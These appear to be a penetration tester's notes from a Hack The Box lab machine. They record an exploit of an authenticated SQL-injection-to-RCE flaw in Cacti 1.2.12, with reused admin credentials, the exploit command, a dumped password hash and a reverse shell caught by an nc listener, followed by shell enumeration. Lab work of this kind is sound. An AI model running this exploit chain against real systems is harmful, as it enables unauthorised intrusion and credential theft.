5 cacti-admin.monitors.htb
http://cacti-admin.monitors.htb > http://cacti-admin.monitors.htb/cacti/index.php
Cacti Login Page
| v 1.2.12
# found authenticated RCE
| https://www.exploit-db.com/exploits/49810
| https://github.com/0z09e/CVE-2020-14295
# trying existing creds
admin:BestAdministrator@2020! works
Using https://www.exploit-db.com/exploits/49810
| changed /bin/sh to /bin/bash
$ python3 49810.py -t http://cacti-admin.monitors.htb -u admin -p 'BestAdministrator@2020!' --lhost 10.10.16.7 --lport 6969
[+] Connecting to the server...
[+] Retrieving CSRF token...
[+] Got CSRF token: sid:c33f8f034803482004d2a1c356af7b555b7eab86,1633463987
[+] Trying to log in...
[+] Successfully logged in!
[+] SQL Injection:
"name","hex"
"",""
"admin","$2y$10$TycpbAes3hYvzsbRxUEbc.dTqT0MdgVipJNBYu8b7rUlmB8zn8JwK"
"guest","43e9a4ab75570f5b"
[+] Check your nc listener!
$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.238] 59396
bash: cannot set terminal process group (1510): Inappropriate ioctl for device
bash: no job control in this shell
www-data@monitors:/usr/share/cacti/cacti$ whoami;id;hostname;uname -a
whoami;id;hostname;uname -a
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
monitors
Linux monitors 4.15.0-151-generic #157-Ubuntu SMP Fri Jul 9 23:07:57 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
# note: we know admin pass for cacti so no cracking needed.